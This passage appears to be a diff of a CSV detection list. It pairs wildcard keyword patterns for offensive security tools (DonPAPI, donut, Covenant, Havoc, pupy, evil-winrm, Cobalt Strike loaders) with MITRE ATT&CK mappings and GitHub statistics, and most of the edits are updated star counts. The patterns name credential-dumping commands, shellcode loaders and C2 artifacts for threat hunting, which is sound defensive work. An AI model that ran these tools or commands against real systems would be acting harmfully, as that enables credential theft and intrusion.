- TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon\DC-IPs.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon\ExploitableSystems.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon\OxidBindings.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon\Windows_Servers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*DomainTrustDiscovery_PowerView.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*domcachedump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*dome.py *","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*domcachedump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dome.py *","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" "*DominicBreuker*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/DominicBreuker","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*DominicBreuker/pspy*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*donapapi -pvk *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*DoNotUseThisPassword123!*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*DominicBreuker/pspy*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*donapapi -pvk *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*DoNotUseThisPassword123!*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" "*DonPAPI ""$DOMAIN""/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*donpapi -credz *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*DonPAPI.py *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*donpapi_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*donpapi-master.zip*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*donpapi -credz *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*DonPAPI.py *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*donpapi_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*donpapi-master.zip*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*donut -f *.dll -c * -m RunProcess*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*donut -f c2.dll*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*donut* \DemoCreateProcess.dll *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*donut.exe *.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*DONUT_BYPASS_CONTINUE*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*donut-loader -*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Donut-Loader -process_id*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" -"*DonutLoader(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*donut* \DemoCreateProcess.dll *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*donut.exe *.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*DONUT_BYPASS_CONTINUE*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*donut-loader -*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Donut-Loader -process_id*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*DonutLoader(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*DonutLoader.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*donut-maker.py -*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*donut-maker.py -i *.exe*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" -"*donut-payload.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*donut-shellcode*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*donut-shellcode*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*donut-maker.py -*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*donut-maker.py -i *.exe*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*donut-payload.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*donut-shellcode*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*donut-shellcode*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*donut-shellcode*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*dos-over-tor*","offensive_tool_keyword","dos-over-tor","Proof of concept denial of service over TOR stress test tool. Is multi-threaded and supports multiple attack vectors.","T1583 - T1090","TA0040 - TA0043","N/A","N/A","DDOS","https://github.com/skizap/dos-over-tor","1","0","N/A","N/A","1","10","11","2018-07-21T01:44:41Z","2018-07-26T07:05:37Z" "*dothatlsassthing*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*dotnet ./Server.dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*dotnet inline-execute *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*dotnet inline-execute *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*dotnet Inveigh.dll*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*dotnet ParseMalleable/ParseMalleable.dll*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" -"*dotnet_serve_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*dotnet_serve_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*DotNet2JSImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*DotNetArtifactGenerator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*DotNetArtifactGenerator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*DoubleAgent.sln*","offensive_tool_keyword","DoubleAgent","DoubleAgent gives the attacker the ability to inject any DLL into any process. The code injection occurs extremely early during the victims process boot. giving the attacker full control over the process and no way for the process to protect itself. The code injection technique is so unique that its not detected or blocked by any antivirus.DoubleAgent can continue injecting code even after reboot making it a perfect persistence technique to survive reboots/updates/reinstalls/patches/etc. Once the attacker decides to inject a DLL into a process. they are forcefully bounded forever. Even if the victim would completely uninstall and reinstall its program. the attackers DLL would still be injected every time the process executes.","T1055 - T1059 - T1053","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Cybellum/DoubleAgent","1","1","N/A","N/A","10","1200","436","2022-08-24T10:32:36Z","2017-03-12T17:05:57Z" "*douknowwhoami?d*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 